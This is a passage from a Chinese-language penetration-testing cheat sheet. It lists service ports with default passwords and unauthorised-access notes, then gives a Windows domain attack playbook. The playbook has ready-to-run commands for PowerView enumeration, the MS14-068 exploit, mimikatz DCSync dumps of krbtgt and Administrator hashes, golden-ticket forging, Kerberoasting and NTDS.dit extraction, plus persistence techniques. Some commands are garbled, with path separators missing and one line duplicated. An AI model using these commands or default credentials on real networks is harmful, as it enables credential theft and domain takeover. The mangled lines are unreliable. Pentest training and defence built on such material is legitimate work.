</code></pre><h4 id="4&#x3001;&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;&#x7AEF;&#x53E3;&#x7206;&#x7834;"><a name="4&#x3001;&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;&#x7AEF;&#x53E3;&#x7206;&#x7834;" class="anchor-navigation-ex-anchor" href="#4&#x3001;&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x7C7B;&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;&#x7AEF;&#x53E3;&#x7206;&#x7834;"><i class="fa fa-link" aria-hidden="true"></i></a>4&#x3001;&#x5E38;&#x7528;&#x7AEF;&#x53E3;&#x7C7B;(&#x626B;&#x63CF;&#x5F31;&#x53E3;&#x4EE4;/&#x7AEF;&#x53E3;&#x7206;&#x7834;)</h4>
<pre class="language-"><code>21 ftp 
22 SSH 
23 Telnet 
445 SMB&#x5F31;&#x53E3;&#x4EE4;&#x626B;&#x63CF; 
2601,2604 zebra&#x8DEF;&#x7531;&#xFF0C;&#x9ED8;&#x8BA4;&#x5BC6;&#x7801;zebra 
3389 &#x8FDC;&#x7A0B;&#x684C;&#x9762;
</code></pre><h4 id="5&#x3001;&#x7AEF;&#x53E3;&#x5408;&#x8BA1;&#x6240;&#x5BF9;&#x5E94;&#x7684;&#x670D;&#x52A1;"><a name="5&#x3001;&#x7AEF;&#x53E3;&#x5408;&#x8BA1;&#x6240;&#x5BF9;&#x5E94;&#x7684;&#x670D;&#x52A1;" class="anchor-navigation-ex-anchor" href="#5&#x3001;&#x7AEF;&#x53E3;&#x5408;&#x8BA1;&#x6240;&#x5BF9;&#x5E94;&#x7684;&#x670D;&#x52A1;"><i class="fa fa-link" aria-hidden="true"></i></a>5&#x3001;&#x7AEF;&#x53E3;&#x5408;&#x8BA1;&#x6240;&#x5BF9;&#x5E94;&#x7684;&#x670D;&#x52A1;</h4>
<pre class="language-"><code>21 ftp 
22 SSH 
23 Telnet 
25 SMTP 
53 DNS 
69 TFTP 
80 web 
80-89 web 
110 POP3 
135 RPC 
139 NETBIOS 
143 IMAP 
161 SNMP 
389 LDAP 
443 SSL&#x5FC3;&#x810F;&#x6EF4;&#x8840;&#x4EE5;&#x53CA;&#x4E00;&#x4E9B;web&#x6F0F;&#x6D1E;&#x6D4B;&#x8BD5; 
445 SMB 
512,513,514 Rexec 
873 Rsync&#x672A;&#x6388;&#x6743; 
1025,111 NFS 
1080 socks 
1158 ORACLE EMCTL 
2601,2604 zebra&#x8DEF;&#x7531;&#xFF0C;&#x9ED8;&#x8BA4;&#x5BC6;&#x7801;zebra 
1433 MSSQL (&#x66B4;&#x529B;&#x7834;&#x89E3;) 
1521 Oracle:(iSqlPlus Port:5560,7778) 
2082/2083 cpanel&#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#x767B;&#x5F55; &#xFF08;&#x56FD;&#x5916;&#x7528;&#x8F83;&#x591A;&#xFF09; 
2222 DA&#x865A;&#x62DF;&#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#x767B;&#x5F55; &#xFF08;&#x56FD;&#x5916;&#x7528;&#x8F83;&#x591A;&#xFF09; 
2601,2604 zebra&#x8DEF;&#x7531;&#xFF0C;&#x9ED8;&#x8BA4;&#x5BC6;&#x7801;zebra 
3128 squid&#x4EE3;&#x7406;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;&#xFF0C;&#x5982;&#x679C;&#x6CA1;&#x8BBE;&#x7F6E;&#x53E3;&#x4EE4;&#x5F88;&#x53EF;&#x80FD;&#x5C31;&#x76F4;&#x63A5;&#x6F2B;&#x6E38;&#x5185;&#x7F51;&#x4E86; 
3306 MySQL &#xFF08;&#x66B4;&#x529B;&#x7834;&#x89E3;&#xFF09; 
3312/3311 kangle&#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#x767B;&#x5F55; 
3389 &#x8FDC;&#x7A0B;&#x684C;&#x9762; 
3690 svn 
4440 rundeck &#x53C2;&#x8003;WooYun: &#x501F;&#x7528;&#x65B0;&#x6D6A;&#x67D0;&#x670D;&#x52A1;&#x6210;&#x529F;&#x6F2B;&#x6E38;&#x65B0;&#x6D6A;&#x5185;&#x7F51; 
4848 GlassFish web&#x4E2D;&#x95F4;&#x4EF6; &#x5F31;&#x53E3;&#x4EE4;:admin/adminadmin 
5432 PostgreSQL 
5900 vnc 
5984 CouchDB http://xxx:5984/_utils/ 
6082 varnish &#x53C2;&#x8003;WooYun: Varnish HTTP accelerator CLI &#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE;&#x6613;&#x5BFC;&#x81F4;&#x7F51;&#x7AD9;&#x88AB;&#x76F4;&#x63A5;&#x7BE1;&#x6539;&#x6216;&#x8005;&#x4F5C;&#x4E3A;&#x4EE3;&#x7406;&#x8FDB;&#x5165;&#x5185;&#x7F51; 
6379 redis&#x672A;&#x6388;&#x6743; 
7001,7002 WebLogic&#x9ED8;&#x8BA4;&#x5F31;&#x53E3;&#x4EE4;&#xFF0C;&#x53CD;&#x5E8F;&#x5217; 
7778 Kloxo&#x4E3B;&#x673A;&#x63A7;&#x5236;&#x9762;&#x677F;&#x767B;&#x5F55; 
8000-9090 &#x90FD;&#x662F;&#x4E00;&#x4E9B;&#x5E38;&#x89C1;&#x7684;web&#x7AEF;&#x53E3;&#xFF0C;&#x6709;&#x4E9B;&#x8FD0;&#x7EF4;&#x559C;&#x6B22;&#x628A;&#x7BA1;&#x7406;&#x540E;&#x53F0;&#x5F00;&#x5728;&#x8FD9;&#x4E9B;&#x975E;80&#x7684;&#x7AEF;&#x53E3;&#x4E0A; 
8080 tomcat/WDCd/ &#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#xFF0C;&#x9ED8;&#x8BA4;&#x5F31;&#x53E3;&#x4EE4; 
8080,8089,9090 JBOSS 
8081 Symantec AV/Filter for MSE 
8083 Vestacp&#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF; &#xFF08;&#x56FD;&#x5916;&#x7528;&#x8F83;&#x591A;&#xFF09; 
8649 ganglia 
8888 amh/LuManager &#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF;&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3; 
9000 fcgi php&#x6267;&#x884C; 
9043 websphere[web&#x4E2D;&#x95F4;&#x4EF6;] &#x5F31;&#x53E3;&#x4EE4;: admin/admin websphere/websphere system/manager 
9200,9300 elasticsearch &#x53C2;&#x8003;WooYun: &#x591A;&#x73A9;&#x67D0;&#x670D;&#x52A1;&#x5668;ElasticSearch&#x547D;&#x4EE4;&#x6267;&#x884C;&#x6F0F;&#x6D1E; 
10000 Virtualmin/Webmin &#x670D;&#x52A1;&#x5668;&#x865A;&#x62DF;&#x4E3B;&#x673A;&#x7BA1;&#x7406;&#x7CFB;&#x7EDF; 
11211 memcache&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE; 
27017,27018 Mongodb&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE; 
28017 mongodb&#x7EDF;&#x8BA1;&#x9875;&#x9762; 
50000 SAP&#x547D;&#x4EE4;&#x6267;&#x884C; 
50060 hadoop 
50070,50030 hadoop&#x9ED8;&#x8BA4;&#x7AEF;&#x53E3;&#x672A;&#x6388;&#x6743;&#x8BBF;&#x95EE;
</code></pre><h2 id="&#x57DF;&#x6E17;&#x900F;"><a name="&#x57DF;&#x6E17;&#x900F;" class="anchor-navigation-ex-anchor" href="#&#x57DF;&#x6E17;&#x900F;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x57DF;&#x6E17;&#x900F;</h2>
<h3 id="&#x4FE1;&#x606F;&#x641C;&#x96C6;_1"><a name="&#x4FE1;&#x606F;&#x641C;&#x96C6;_1" class="anchor-navigation-ex-anchor" href="#&#x4FE1;&#x606F;&#x641C;&#x96C6;_1"><i class="fa fa-link" aria-hidden="true"></i></a>&#x4FE1;&#x606F;&#x641C;&#x96C6;</h3>
<p>powerview.ps1 </p>
<pre class="language-"><code>Get-NetDomain - gets the name of the current user&apos;s domain
Get-NetForest - gets the forest associated with the current user&apos;s domain
Get-NetForestDomains - gets all domains for the current forest
Get-NetDomainControllers - gets the domain controllers for the current computer&apos;s domain
Get-NetCurrentUser - gets the current [domain\]username
Get-NetUser - returns all user objects, or the user specified (wildcard specifiable)
Get-NetUserSPNs - gets all user ServicePrincipalNames
Get-NetOUs - gets data for domain organization units
Get-NetGUIDOUs - finds domain OUs linked to a specific GUID
Invoke-NetUserAdd - adds a local or domain user
Get-NetGroups - gets a list of all current groups in the domain
Get-NetGroup - gets data for each user in a specified domain group
Get-NetLocalGroups - gets a list of localgroups on a remote host or hosts
Get-NetLocalGroup - gets the members of a localgroup on a remote host or hosts
Get-NetLocalServices - gets a list of running services/paths on a remote host or hosts
Invoke-NetGroupUserAdd - adds a user to a specified local or domain group
Get-NetComputers - gets a list of all current servers in the domain
Get-NetFileServers - get a list of file servers used by current domain users
Get-NetShare - gets share information for a specified server
Get-NetLoggedon - gets users actively logged onto a specified server
Get-NetSessions - gets active sessions on a specified server
Get-NetFileSessions - returned combined Get-NetSessions and Get-NetFiles
Get-NetConnections - gets active connections to a specific server resource (share)
Get-NetFiles - gets open files on a server
Get-NetProcesses - gets the remote processes and owners on a remote server
</code></pre><p>BloodHound</p>
<h3 id="&#x83B7;&#x53D6;&#x57DF;&#x63A7;&#x7684;&#x65B9;&#x6CD5;"><a name="&#x83B7;&#x53D6;&#x57DF;&#x63A7;&#x7684;&#x65B9;&#x6CD5;" class="anchor-navigation-ex-anchor" href="#&#x83B7;&#x53D6;&#x57DF;&#x63A7;&#x7684;&#x65B9;&#x6CD5;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x83B7;&#x53D6;&#x57DF;&#x63A7;&#x7684;&#x65B9;&#x6CD5;</h3>
<h4 id="sysvol"><a name="sysvol" class="anchor-navigation-ex-anchor" href="#sysvol"><i class="fa fa-link" aria-hidden="true"></i></a>SYSVOL</h4>
<p>SYSVOL&#x662F;&#x6307;&#x5B58;&#x50A8;&#x57DF;&#x516C;&#x5171;&#x6587;&#x4EF6;&#x670D;&#x52A1;&#x5668;&#x526F;&#x672C;&#x7684;&#x5171;&#x4EAB;&#x6587;&#x4EF6;&#x5939;&#xFF0C;&#x5B83;&#x4EEC;&#x5728;&#x57DF;&#x4E2D;&#x6240;&#x6709;&#x7684;&#x57DF;&#x63A7;&#x5236;&#x5668;&#x4E4B;&#x95F4;&#x590D;&#x5236;&#x3002; Sysvol&#x6587;&#x4EF6;&#x5939;&#x662F;&#x5B89;&#x88C5;AD&#x65F6;&#x521B;&#x5EFA;&#x7684;&#xFF0C;&#x5B83;&#x7528;&#x6765;&#x5B58;&#x653E;GPO&#x3001;Script&#x7B49;&#x4FE1;&#x606F;&#x3002;&#x540C;&#x65F6;&#xFF0C;&#x5B58;&#x653E;&#x5728;Sysvol&#x6587;&#x4EF6;&#x5939;&#x4E2D;&#x7684;&#x4FE1;&#x606F;&#xFF0C;&#x4F1A;&#x590D;&#x5236;&#x5230;&#x57DF;&#x4E2D;&#x6240;&#x6709;DC&#x4E0A;&#x3002; 
&#x76F8;&#x5173;&#x9605;&#x8BFB;: </p>
<ul>
<li><a href="http://www.freebuf.com/vuls/92016.html" target="_blank">&#x5BFB;&#x627E;SYSVOL&#x91CC;&#x7684;&#x5BC6;&#x7801;&#x548C;&#x653B;&#x51FB;GPP&#xFF08;&#x7EC4;&#x7B56;&#x7565;&#x504F;&#x597D;&#xFF09; </a></li>
<li><a href="http://blog.51cto.com/ycrsjxy/203095" target="_blank">Windows Server 2008 R2&#x4E4B;&#x56DB;&#x7BA1;&#x7406;Sysvol&#x6587;&#x4EF6;&#x5939; </a></li>
<li><a href="https://adsecurity.org/?p=2288" target="_blank">SYSVOL&#x4E2D;&#x67E5;&#x627E;&#x5BC6;&#x7801;&#x5E76;&#x5229;&#x7528;&#x7EC4;&#x7B56;&#x7565;&#x9996;&#x9009;&#x9879; </a></li>
<li><a href="https://xz.aliyun.com/t/1653" target="_blank">&#x5229;&#x7528;SYSVOL&#x8FD8;&#x539F;&#x7EC4;&#x7B56;&#x7565;&#x4E2D;&#x4FDD;&#x5B58;&#x7684;&#x5BC6;&#x7801;</a> </li>
</ul>
<h4 id="ms14-068-kerberos"><a name="ms14-068-kerberos" class="anchor-navigation-ex-anchor" href="#ms14-068-kerberos"><i class="fa fa-link" aria-hidden="true"></i></a>MS14-068 Kerberos</h4>
<pre class="language-"><code>python ms14-068.py -u &#x57DF;&#x7528;&#x6237;@&#x57DF;&#x540D; -p &#x5BC6;&#x7801; -s &#x7528;&#x6237;SID -d &#x57DF;&#x4E3B;&#x673A;
</code></pre><p>&#x5229;&#x7528;mimikatz&#x5C06;&#x5DE5;&#x5177;&#x5F97;&#x5230;&#x7684;TGT_domainuser@SERVER.COM.ccache&#x5199;&#x5165;&#x5185;&#x5B58;&#xFF0C;&#x521B;&#x5EFA;&#x7F13;&#x5B58;&#x8BC1;&#x4E66;&#xFF1A;</p>
<pre class="language-"><code>mimikatz.exe &quot;kerberos::ptc c:TGT_darthsidious@pentest.com.ccache&quot; exit
net use k: \pentest.comc$
</code></pre><p>&#x76F8;&#x5173;&#x9605;&#x8BFB; :</p>
<ul>
<li><a href="http://adsecurity.org/?p=676" target="_blank">Kerberos&#x7684;&#x5DE5;&#x5177;&#x5305;PyKEK</a> </li>
<li><a href="http://www.freebuf.com/vuls/56081.html" target="_blank">&#x6DF1;&#x5165;&#x89E3;&#x8BFB;MS14-068&#x6F0F;&#x6D1E;</a> </li>
<li><a href="https://adsecurity.org/?p=541" target="_blank">Kerberos&#x7684;&#x5B89;&#x5168;&#x6F0F;&#x6D1E;</a> </li>
</ul>
<h4 id="spn&#x626B;&#x63CF;"><a name="spn&#x626B;&#x63CF;" class="anchor-navigation-ex-anchor" href="#spn&#x626B;&#x63CF;"><i class="fa fa-link" aria-hidden="true"></i></a>SPN&#x626B;&#x63CF;</h4>
<p>Kerberoast&#x53EF;&#x4EE5;&#x4F5C;&#x4E3A;&#x4E00;&#x4E2A;&#x6709;&#x6548;&#x7684;&#x65B9;&#x6CD5;&#x4ECE;Active Directory&#x4E2D;&#x4EE5;&#x666E;&#x901A;&#x7528;&#x6237;&#x7684;&#x8EAB;&#x4EFD;&#x63D0;&#x53D6;&#x670D;&#x52A1;&#x5E10;&#x6237;&#x51ED;&#x636E;&#xFF0C;&#x65E0;&#x9700;&#x5411;&#x76EE;&#x6807;&#x7CFB;&#x7EDF;&#x53D1;&#x9001;&#x4EFB;&#x4F55;&#x6570;&#x636E;&#x5305;&#x3002;
SPN&#x662F;&#x670D;&#x52A1;&#x5728;&#x4F7F;&#x7528;Kerberos&#x8EAB;&#x4EFD;&#x9A8C;&#x8BC1;&#x7684;&#x7F51;&#x7EDC;&#x4E0A;&#x7684;&#x552F;&#x4E00;&#x6807;&#x8BC6;&#x7B26;&#x3002;&#x5B83;&#x7531;&#x670D;&#x52A1;&#x7C7B;&#xFF0C;&#x4E3B;&#x673A;&#x540D;&#x548C;&#x7AEF;&#x53E3;&#x7EC4;&#x6210;&#x3002;&#x5728;&#x4F7F;&#x7528;Kerberos&#x8EAB;&#x4EFD;&#x9A8C;&#x8BC1;&#x7684;&#x7F51;&#x7EDC;&#x4E2D;&#xFF0C;&#x5FC5;&#x987B;&#x5728;&#x5185;&#x7F6E;&#x8BA1;&#x7B97;&#x673A;&#x5E10;&#x6237;&#xFF08;&#x5982;NetworkService&#x6216;LocalSystem&#xFF09;&#x6216;&#x7528;&#x6237;&#x5E10;&#x6237;&#x4E0B;&#x4E3A;&#x670D;&#x52A1;&#x5668;&#x6CE8;&#x518C;SPN&#x3002;&#x5BF9;&#x4E8E;&#x5185;&#x90E8;&#x5E10;&#x6237;&#xFF0C;SPN&#x5C06;&#x81EA;&#x52A8;&#x8FDB;&#x884C;&#x6CE8;&#x518C;&#x3002;&#x4F46;&#x662F;&#xFF0C;&#x5982;&#x679C;&#x5728;&#x57DF;&#x7528;&#x6237;&#x5E10;&#x6237;&#x4E0B;&#x8FD0;&#x884C;&#x670D;&#x52A1;&#xFF0C;&#x5219;&#x5FC5;&#x987B;&#x4E3A;&#x8981;&#x4F7F;&#x7528;&#x7684;&#x5E10;&#x6237;&#x7684;&#x624B;&#x52A8;&#x6CE8;&#x518C;SPN&#x3002;
SPN&#x626B;&#x63CF;&#x7684;&#x4E3B;&#x8981;&#x597D;&#x5904;&#x662F;&#xFF0C;SPN&#x626B;&#x63CF;&#x4E0D;&#x9700;&#x8981;&#x8FDE;&#x63A5;&#x5230;&#x7F51;&#x7EDC;&#x4E0A;&#x7684;&#x6BCF;&#x4E2A;IP&#x6765;&#x68C0;&#x67E5;&#x670D;&#x52A1;&#x7AEF;&#x53E3;&#xFF0C;SPN&#x901A;&#x8FC7;LDAP&#x67E5;&#x8BE2;&#x5411;&#x57DF;&#x63A7;&#x6267;&#x884C;&#x670D;&#x52A1;&#x53D1;&#x73B0;&#xFF0C;SPN&#x67E5;&#x8BE2;&#x662F;Kerberos&#x7684;&#x7968;&#x636E;&#x884C;&#x4E3A;&#x4E00;&#x90E8;&#x5206;&#xFF0C;&#x56E0;&#x6B64;&#x6BD4;&#x8F83;&#x96BE;&#x68C0;&#x6D4B;SPN&#x626B;&#x63CF;&#x3002;
&#x76F8;&#x5173;&#x9605;&#x8BFB; :</p>
<ul>
<li><a href="https://blog.netspi.com/locate-and-attack-domain-sql-servers-without-scanning/" target="_blank">&#x975E;&#x626B;&#x63CF;&#x5F0F;&#x7684;SQL Server&#x53D1;&#x73B0;</a> </li>
<li><a href="https://adsecurity.org/?p=1508" target="_blank">SPN&#x626B;&#x63CF;</a> </li>
<li><a href="https://github.com/PyroTek3/PowerShell-AD-Recon" target="_blank">&#x626B;&#x63CF;SQLServer&#x7684;&#x811A;&#x672C;</a> </li>
</ul>
<h4 id="kerberos&#x7684;&#x9EC4;&#x91D1;&#x95E8;&#x7968;"><a name="kerberos&#x7684;&#x9EC4;&#x91D1;&#x95E8;&#x7968;" class="anchor-navigation-ex-anchor" href="#kerberos&#x7684;&#x9EC4;&#x91D1;&#x95E8;&#x7968;"><i class="fa fa-link" aria-hidden="true"></i></a>Kerberos&#x7684;&#x9EC4;&#x91D1;&#x95E8;&#x7968;</h4>
<p>&#x5728;&#x57DF;&#x4E0A;&#x6293;&#x53D6;&#x7684;&#x54C8;&#x5E0C;</p>
<pre class="language-"><code>lsadump::dcsync /domain:pentest.com /user:krbtgt
</code></pre><pre class="language-"><code>kerberos::purge
kerberos::golden /admin:administrator /domain:&#x57DF; /sid:SID /krbtgt:hash&#x503C; /ticket:adinistrator.kiribi
kerberos::ptt administrator.kiribi
kerberos::tgt
net use k: \pnet use k: \pentest.comc$
</code></pre><p>&#x76F8;&#x5173;&#x9605;&#x8BFB; :</p>
<ul>
<li><a href="https://adsecurity.org/?p=1640" target="_blank">https://adsecurity.org/?p=1640</a> </li>
<li><a href="http://bobao.360.cn/learning/detail/3564.html" target="_blank">&#x57DF;&#x670D;&#x52A1;&#x8D26;&#x53F7;&#x7834;&#x89E3;&#x5B9E;&#x8DF5;</a> </li>
<li><a href="https://blog.csdn.net/wulantian/article/details/42418231" target="_blank">Kerberos&#x7684;&#x8BA4;&#x8BC1;&#x539F;&#x7406;</a> </li>
<li><a href="https://klionsec.github.io/2016/08/10/ntlm-kerberos/" target="_blank">&#x6DF1;&#x523B;&#x7406;&#x89E3;windows&#x5B89;&#x5168;&#x8BA4;&#x8BC1;&#x673A;&#x5236;ntlm&#xFF06;Kerberos</a> </li>
</ul>
<h4 id="kerberos&#x7684;&#x94F6;&#x7968;&#x52A1;"><a name="kerberos&#x7684;&#x94F6;&#x7968;&#x52A1;" class="anchor-navigation-ex-anchor" href="#kerberos&#x7684;&#x94F6;&#x7968;&#x52A1;"><i class="fa fa-link" aria-hidden="true"></i></a>Kerberos&#x7684;&#x94F6;&#x7968;&#x52A1;</h4>
<p>&#x9EC4;&#x91D1;&#x7968;&#x636E;&#x548C;&#x767D;&#x94F6;&#x7968;&#x636E;&#x7684;&#x4E00;&#x4E9B;&#x533A;&#x522B;&#xFF1A;
Golden Ticket&#xFF1A;&#x4F2A;&#x9020;<code>TGT</code>&#xFF0C;&#x53EF;&#x4EE5;&#x83B7;&#x53D6;<code>&#x4EFB;&#x4F55;Kerberos</code>&#x670D;&#x52A1;&#x6743;&#x9650;
&#x94F6;&#x7968;&#xFF1A;&#x4F2A;&#x9020;TGS&#xFF0C;<code>&#x53EA;&#x80FD;&#x8BBF;&#x95EE;&#x6307;&#x5B9A;&#x7684;&#x670D;&#x52A1;</code>
&#x52A0;&#x5BC6;&#x65B9;&#x5F0F;&#x4E0D;&#x540C;&#xFF1A;
Golden Ticket&#x7531;<code>krbtgt</code>&#x7684;hash&#x52A0;&#x5BC6;
Silver Ticket&#x7531;<code>&#x670D;&#x52A1;&#x8D26;&#x53F7;</code>&#xFF08;&#x901A;&#x5E38;&#x4E3A;&#x8BA1;&#x7B97;&#x673A;&#x8D26;&#x6237;&#xFF09;Hash&#x52A0;&#x5BC6;
&#x8BA4;&#x8BC1;&#x6D41;&#x7A0B;&#x4E0D;&#x540C;&#xFF1A;
&#x91D1;&#x7968;&#x5728;&#x4F7F;&#x7528;&#x7684;&#x8FC7;&#x7A0B;&#x9700;&#x8981;&#x540C;&#x57DF;&#x63A7;&#x901A;&#x4FE1;
&#x94F6;&#x7968;&#x5728;&#x4F7F;&#x7528;&#x7684;&#x8FC7;&#x7A0B;&#x4E0D;&#x9700;&#x8981;&#x540C;&#x57DF;&#x63A7;&#x901A;&#x4FE1;
&#x76F8;&#x5173;&#x9605;&#x8BFB; :</p>
<ul>
<li><a href="https://adsecurity.org/?p=2011" target="_blank">&#x653B;&#x51FB;&#x8005;&#x5982;&#x4F55;&#x4F7F;&#x7528;Kerberos&#x7684;&#x94F6;&#x7968;&#x6765;&#x5229;&#x7528;&#x7CFB;&#x7EDF;</a> </li>
<li><a href="https://www.feiworks.com/wy/drops/%E5%9F%9F%E6%B8%97%E9%80%8F%E2%80%94%E2%80%94Pass%20The%20Ticket.pdf" target="_blank">&#x57DF;&#x6E17;&#x900F;&#x2014;&#x2014;Pass The Ticket</a></li>
</ul>
<h4 id="&#x57DF;&#x670D;&#x52A1;&#x8D26;&#x53F7;&#x7834;&#x89E3;"><a name="&#x57DF;&#x670D;&#x52A1;&#x8D26;&#x53F7;&#x7834;&#x89E3;" class="anchor-navigation-ex-anchor" href="#&#x57DF;&#x670D;&#x52A1;&#x8D26;&#x53F7;&#x7834;&#x89E3;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x57DF;&#x670D;&#x52A1;&#x8D26;&#x53F7;&#x7834;&#x89E3;</h4>
<p>&#x4E0E;&#x4E0A;&#x9762;SPN&#x626B;&#x63CF;&#x7C7B;&#x4F3C;&#x7684;&#x539F;&#x7406;
<a href="https://github.com/nidem/kerberoast" target="_blank">https://github.com/nidem/kerberoast</a>
&#x83B7;&#x53D6;&#x6240;&#x6709;&#x7528;&#x4F5C;SPN&#x7684;&#x5E10;&#x6237;</p>
<pre class="language-"><code>setspn -T PENTEST.com -Q */*
</code></pre><p>&#x4ECE;Mimikatz&#x7684;RAM&#x4E2D;&#x63D0;&#x53D6;&#x83B7;&#x5F97;&#x7684;&#x95E8;&#x7968;</p>
<pre class="language-"><code>kerberos::list /export
</code></pre><p>&#x7528;tgsrepcrack&#x7834;&#x89E3;</p>
<pre class="language-"><code>tgsrepcrack.py wordlist.txt 1-MSSQLSvc~sql01.medin.local~1433-MYDOMAIN.LOCAL.kirbi
</code></pre><h4 id="&#x51ED;&#x8BC1;&#x76D7;&#x7A83;"><a name="&#x51ED;&#x8BC1;&#x76D7;&#x7A83;" class="anchor-navigation-ex-anchor" href="#&#x51ED;&#x8BC1;&#x76D7;&#x7A83;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x51ED;&#x8BC1;&#x76D7;&#x7A83;</h4>
<p>&#x4ECE;&#x641C;&#x96C6;&#x7684;&#x5BC6;&#x7801;&#x91CC;&#x9762;&#x627E;&#x7BA1;&#x7406;&#x5458;&#x7684;&#x5BC6;&#x7801; </p>
<h4 id="&#x5730;&#x5740;&#x89E3;&#x6790;&#x534F;&#x8BAE;"><a name="&#x5730;&#x5740;&#x89E3;&#x6790;&#x534F;&#x8BAE;" class="anchor-navigation-ex-anchor" href="#&#x5730;&#x5740;&#x89E3;&#x6790;&#x534F;&#x8BAE;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x5730;&#x5740;&#x89E3;&#x6790;&#x534F;&#x8BAE;</h4>
<p>&#x5B9E;&#x5728;&#x641E;&#x4E0D;&#x5B9A;&#x518D;&#x641E;ARP 
&#x200B;    </p>
<h3 id="&#x83B7;&#x53D6;ad&#x54C8;&#x5E0C;"><a name="&#x83B7;&#x53D6;ad&#x54C8;&#x5E0C;" class="anchor-navigation-ex-anchor" href="#&#x83B7;&#x53D6;ad&#x54C8;&#x5E0C;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x83B7;&#x53D6;AD&#x54C8;&#x5E0C;</h3>
<ul>
<li>&#x4F7F;&#x7528;VSS&#x5377;&#x5F71;&#x526F;&#x672C; </li>
<li>Ntdsutil&#x4E2D;&#x83B7;&#x53D6;NTDS.DIT&#x6587;&#x4EF6; </li>
<li>PowerShell&#x4E2D;&#x63D0;&#x53D6;NTDS.DIT --&gt;<a href="https://github.com/clymb3r/PowerShell/tree/master/Invoke-NinjaCopy" target="_blank">Invoke-NinjaCopy</a></li>
<li>&#x4F7F;&#x7528;Mimikatz&#x63D0;&#x53D6; </li>
</ul>
<pre class="language-"><code>mimikatz lsadump::lsa /inject exit
</code></pre><ul>
<li>&#x4F7F;&#x7528;PowerShell Mimikatz</li>
<li>&#x4F7F;&#x7528;Mimikatz&#x7684;DCSync &#x8FDC;&#x7A0B;&#x8F6C;&#x50A8;Active Directory&#x51ED;&#x8BC1;
&#x63D0;&#x53D6; KRBTGT&#x7528;&#x6237;&#x5E10;&#x6237;&#x7684;&#x5BC6;&#x7801;&#x6570;&#x636E;&#xFF1A;</li>
</ul>
<pre class="language-"><code>Mimikatz &quot;privilege::debug&quot; &quot;lsadump::dcsync /domain:rd.adsecurity.org /user&#xFF1A;krbtgt&quot;exit
</code></pre><p>&#x7BA1;&#x7406;&#x5458;&#x7528;&#x6237;&#x5E10;&#x6237;&#x63D0;&#x53D6;&#x5BC6;&#x7801;&#x6570;&#x636E;&#xFF1A;</p>
<pre class="language-"><code>Mimikatz &quot;privilege::debug&quot; &quot;lsadump::dcsync /domain:rd.adsecurity.org /user&#xFF1A;Administrator&quot; exit
</code></pre><ul>
<li>NTDS.dit&#x4E2D;&#x63D0;&#x53D6;&#x54C8;&#x5E0C; 
&#x4F7F;&#x7528;esedbexport&#x6062;&#x590D;&#x4EE5;&#x540E;&#x4F7F;&#x7528;ntdsxtract&#x63D0;&#x53D6; </li>
</ul>
<h3 id="ad&#x6301;&#x4E45;&#x5316;"><a name="ad&#x6301;&#x4E45;&#x5316;" class="anchor-navigation-ex-anchor" href="#ad&#x6301;&#x4E45;&#x5316;"><i class="fa fa-link" aria-hidden="true"></i></a>AD&#x6301;&#x4E45;&#x5316;</h3>
<h4 id="&#x6D3B;&#x52A8;&#x76EE;&#x5F55;&#x6301;&#x4E45;&#x6027;&#x6280;&#x5DE7;"><a name="&#x6D3B;&#x52A8;&#x76EE;&#x5F55;&#x6301;&#x4E45;&#x6027;&#x6280;&#x5DE7;" class="anchor-navigation-ex-anchor" href="#&#x6D3B;&#x52A8;&#x76EE;&#x5F55;&#x6301;&#x4E45;&#x6027;&#x6280;&#x5DE7;"><i class="fa fa-link" aria-hidden="true"></i></a>&#x6D3B;&#x52A8;&#x76EE;&#x5F55;&#x6301;&#x4E45;&#x6027;&#x6280;&#x5DE7;</h4>
<p><a href="https://adsecurity.org/?p=1929" target="_blank">https://adsecurity.org/?p=1929</a> 
DS&#x6062;&#x590D;&#x6A21;&#x5F0F;&#x5BC6;&#x7801;&#x7EF4;&#x62A4; 
DSRM&#x5BC6;&#x7801;&#x540C;&#x6B65; </p>
<blockquote>
<p>Windows Server 2008 &#x9700;&#x8981;&#x5B89;&#x88C5;KB961320&#x8865;&#x4E01;&#x624D;&#x652F;&#x6301;DSRM&#x5BC6;&#x7801;&#x540C;&#x6B65;&#xFF0C;Windows Server 2003&#x4E0D;&#x652F;&#x6301;DSRM&#x5BC6;&#x7801;&#x540C;&#x6B65;&#x3002;KB961320:<a href="https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni" target="_blank">https://support.microsoft.com/en-us/help/961320/a-feature-is-available-for-windows-server-2008-that-lets-you-synchroni</a>,&#x53EF;&#x53C2;&#x8003;&#xFF1A;<a href="http://drops.xmd5.com/static/drops/tips-9297.html" target="_blank">&#x5DE7;&#x7528;DSRM&#x5BC6;&#x7801;&#x540C;&#x6B65;&#x5C06;&#x57DF;&#x63A7;&#x6743;&#x9650;&#x6301;&#x4E45;&#x5316;</a></p>
</blockquote>
<p><a href="https://www.dcshadow.com/" target="_blank">DCshadow </a></p>
<h4 id="security-support-provider"><a name="security-support-provider" class="anchor-navigation-ex-anchor" href="#security-support-provider"><i class="fa fa-link" aria-hidden="true"></i></a>Security Support Provider</h4>
